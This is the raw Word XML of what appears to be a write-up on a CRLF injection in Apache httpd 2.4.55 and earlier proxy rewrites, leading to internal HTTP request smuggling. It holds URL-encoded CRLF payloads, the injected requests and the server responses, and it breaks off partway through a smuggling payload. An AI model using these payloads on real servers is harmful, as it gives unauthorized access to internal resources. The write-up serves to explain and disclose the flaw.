      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>LoadModule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> proxy_module modules/mod_proxy.so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>LoadModule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> proxy_http_module modules/mod_proxy_http.so</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880000"/>
        </w:rPr>
        <w:t>&lt;VirtualHost *:80&gt;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RewriteEngine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="78A960"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>RewriteRule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"^/categories/(.*)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>"http://192.168.10.100:8080/categories.php?id=$1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1F7199"/>
        </w:rPr>
        <w:t xml:space="preserve"> [P]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>ProxyPassReverse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"/categories/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"http://192.168.10.100:8080/"</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880000"/>
        </w:rPr>
        <w:t>&lt;/VirtualHost&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C62CB58" w14:textId="57C0AD52" w:rsidR="003C1139" w:rsidRDefault="003C1139" w:rsidP="003C1139">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BA0D253" w14:textId="4276EF71" w:rsidR="00CC4AAA" w:rsidRPr="003C1139" w:rsidRDefault="003C1139" w:rsidP="00CC4AAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1139">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP Request Splitting causing HTTP Request Smuggling on backend service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D4F642" w14:textId="4F9B0B15" w:rsidR="003C1139" w:rsidRPr="003C1139" w:rsidRDefault="003C1139" w:rsidP="003C1139">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1139">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>In this section, I will explain how a CRLF injection can lead to internal HTTP Request Smuggling, enabling an attacker to gain unauthorized access to internal resources that would otherwise be inaccessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F81AFE" w14:textId="77777777" w:rsidR="003C1139" w:rsidRPr="003C1139" w:rsidRDefault="003C1139" w:rsidP="003C1139">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1139">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Identifying the CRLF Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01305406" w14:textId="77777777" w:rsidR="003C1139" w:rsidRPr="003C1139" w:rsidRDefault="003C1139" w:rsidP="003C1139">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1139">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Based on the advisory description the httpd &lt;=2.4.55 is vulnerable to HTTP Response Splitting also known as CRLF Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBC9C74" w14:textId="0A050E6E" w:rsidR="003C1139" w:rsidRPr="003C1139" w:rsidRDefault="003C1139" w:rsidP="003C1139">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1139">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The CRLF Injection occurs when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CAE5BC" w14:textId="77777777" w:rsidR="003C1139" w:rsidRPr="003C1139" w:rsidRDefault="003C1139" w:rsidP="003C1139">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1139">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Data enters a web application through an untrusted source, most frequently an HTTP request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDC1DBD" w14:textId="77777777" w:rsidR="003C1139" w:rsidRPr="003C1139" w:rsidRDefault="003C1139" w:rsidP="003C1139">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1139">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The data is included in an HTTP response header sent to a web user without being validated for malicious characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174F756C" w14:textId="7F0757B7" w:rsidR="003C1139" w:rsidRPr="003C1139" w:rsidRDefault="003C1139" w:rsidP="003C1139">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1139">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>which in our case can be confirmed passing the following CRLF prefix in URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022F3530" w14:textId="47B3C6B8" w:rsidR="003C1139" w:rsidRPr="003C1139" w:rsidRDefault="003C1139" w:rsidP="003C1139">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Foo: baarr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>\r\n\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>%20HTTP/1.1%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>0d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>%0aFoo:%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>20baarr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3003C5D0" w14:textId="68181B1F" w:rsidR="003C1139" w:rsidRDefault="003C1139" w:rsidP="003C1139">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1139">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>By appending the above prefix to the URL, the resulting final request will be as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C6831E" w14:textId="77777777" w:rsidR="003C1139" w:rsidRDefault="003C1139">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>GET /categories/</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20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>HTTP/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>1.1</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aFoo:%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>baarr HTTP/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Host: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>192.168.1.103</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>User-Agent: Mozilla/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>5.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows NT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>10.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>; Win64; x64) AppleWebKit/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>537.36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> (KHTML, like Gecko) Chrome/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>96.0.4664.45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> Safari/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379A641A" w14:textId="32509F9D" w:rsidR="003C1139" w:rsidRDefault="008C21BD" w:rsidP="00CC4AAA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C21BD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Following the request, the server will process the data and return a 200 response code indicating vulnebility to CRLF Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBBCFD8" w14:textId="77777777" w:rsidR="008C21BD" w:rsidRDefault="008C21BD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>HTTP/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Date: Mon, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> May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02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>05</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> GMT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>Server: Apache/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>2.4.54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Debian)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>X-Powered-By: PHP/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>7.4.33</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Content-Length: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Type: text/html; charset=UTF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">You category ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AABE6F" w14:textId="700C4383" w:rsidR="008C21BD" w:rsidRPr="00E56D5A" w:rsidRDefault="00E56D5A" w:rsidP="008C21BD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E56D5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal HTTP Request Smuggling via Header Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A834CC7" w14:textId="77777777" w:rsidR="00E56D5A" w:rsidRPr="00E56D5A" w:rsidRDefault="00E56D5A" w:rsidP="00E56D5A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E56D5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Using the header injection we will perform the internal HTTP Request Smuggling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526DB0A2" w14:textId="6A251315" w:rsidR="00E56D5A" w:rsidRDefault="00E56D5A" w:rsidP="00E56D5A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E56D5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lets begin with the following prefix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386840A5" w14:textId="77777777" w:rsidR="00E56D5A" w:rsidRDefault="00E56D5A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>HTTP/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>\r\nHost: localhost\r\n\r\nGET /SMUGGLED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>HTTP/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>1.1</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aHost:%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
